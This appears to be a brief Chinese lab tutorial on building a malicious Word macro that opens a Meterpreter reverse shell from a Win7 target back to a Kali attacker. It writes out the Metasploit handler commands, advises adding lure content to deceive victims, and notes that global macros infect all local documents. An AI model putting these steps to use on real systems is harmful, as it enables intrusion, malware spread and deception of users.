使用宏病毒反弹shell

宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上。从此以后,所有自动保存的文档都会“感染”上这种宏病毒,而且如果其他用户打开了感染病毒的文档,宏病毒又会转移到他的计算机上。那么,宏病毒是如何产生的呢?
准备环境
kali 攻击机
win7 靶机
生成payload
使用kali虚拟机,输入以下命令
使用宏病毒反弹shell_第1张图片 打开win7虚拟机新建宏
使用宏病毒反弹shell_第2张图片
粘贴生成的宏代码
使用宏病毒反弹shell_第3张图片
在kali中输入
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.14.129
set LPORT 6666
exploit
使用宏病毒反弹shell_第4张图片
启用宏

使用宏病毒反弹shell_第5张图片

填上迷惑性内容

使用宏病毒反弹shell_第6张图片

如果设的是全局宏,会有传染性,所有本机的word都会被感染。可在C:\Users\(username)\AppData\Roaming\Microsoft\Templates看到宏文件。
在这里插入图片描述

你可能感兴趣的:(漏洞复现)